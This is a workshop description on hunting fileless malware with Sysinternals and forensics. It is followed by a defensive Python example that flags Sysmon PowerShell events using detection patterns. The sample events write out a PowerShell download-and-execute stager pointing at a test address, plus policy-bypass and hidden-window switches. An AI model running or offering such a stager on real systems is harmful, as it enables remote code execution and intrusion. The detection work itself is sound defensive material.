Hunting fileless malware
2019-05-16, 11:00–13:00, Workshop Area

Fileless malware and built-in system tools as bypass techniques in cyber attacks, and how to hunt for them with Sysinternals tools and digital forensics techniques.

  1. Fileless malware and system tools as bypass techniques: what “bypass technique” and “fileless malware” mean. Creating custom fileless malware by abusing PowerShell.

  2. Threat hunting with Sysinternals tools: system processes, threads, jobs and resources explained. Anomaly detection in system processes with Sysinternals tools. Detecting fileless malware.

  3. Threat hunting with digital forensics techniques: what “digital forensics” means. Acquisition and analysis of a RAM memory dump with digital forensics tools.

  4. Summary, or what participants take away from this workshop: knowledge of the top bypass techniques, hands-on skills for detecting and hunting malicious code, and an understanding of how hunting with Sysinternals tools differs from hunting with digital forensics tools.
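
The kind of hunting logic items 1 and 2 describe, shown as an added example that is not part of the workshop material: it scores Sysmon (a Sysinternals tool) Event ID 1 process-creation records for the classic fileless PowerShell indicators: a base64 -EncodedCommand payload (decoded in place), an in-memory download cradle such as IEX/DownloadString, hiding and policy-bypass switches, and an Office or script host as the parent of a shell. The events below are constructed samples; the field names Image, ParentImage and CommandLine are the ones Sysmon writes.

```python
"""Hunt fileless PowerShell activity in Sysmon process-creation events.

Added example (not the workshop's own code). Input records are constructed
samples shaped like Sysmon Event ID 1 EventData (Image, ParentImage, CommandLine).
"""
import base64
import re
from dataclasses import dataclass

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# Download/execute cradles and in-memory loading typical of fileless stagers.
CRADLE_RE = re.compile(
    r"(?i)(Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient|"
    r"FromBase64String|Reflection\.Assembly)"
)
# Switches used to hide the window and de-restrict PowerShell.
EVASION_RE = re.compile(
    r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop\b|noni\b|ep\s+bypass|exec\w*\s+bypass)"
)
# Office and script hosts do not normally spawn shells.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass
class Finding:
    rule: str
    detail: str


def encode_ps(script):
    """Produce the base64 form -EncodedCommand expects (UTF-16LE). Used only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event):
    """Return the Findings for one process-creation record."""
    findings = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image in SHELLS and parent in SUSPICIOUS_PARENTS:
        findings.append(Finding("suspicious_parent", f"{parent} -> {image}"))
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(Finding("encoded_command", decoded))
    # Scan the visible command line and any decoded payload together.
    cradle = CRADLE_RE.search(cmd + "\n" + (decoded or ""))
    if cradle:
        findings.append(Finding("download_cradle", cradle.group(1)))
    evasion = EVASION_RE.search(cmd)
    if evasion:
        findings.append(Finding("evasion_switch", evasion.group(0).strip()))
    return findings


def hunt(events):
    """Map event index -> sorted rule names, for events with at least one finding."""
    hits = {}
    for i, ev in enumerate(events):
        rules = sorted({f.rule for f in analyse(ev)})
        if rules:
            hits[i] = rules
    return hits


# Constructed sample events (hypothetical hosts, RFC 5737 test address).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoLogo -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGER)},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'powershell.exe -ExecutionPolicy Bypass -Command "' + STAGER + '"'},
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        print(idx, rules)
        for f in analyse(SAMPLE_EVENTS[idx]):
            print("   ", f.rule, "=>", f.detail[:80])
```

The decoded payload is scanned with the same cradle rules as the plain command line, which is what catches the Word-spawned stager in the second sample even though nothing suspicious is visible in the raw command line; the benign scheduled backup in the first sample produces no finding.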

Blue teamer, threat hunter, digital forensics investigator and Chief Security Analyst at RMRF-team.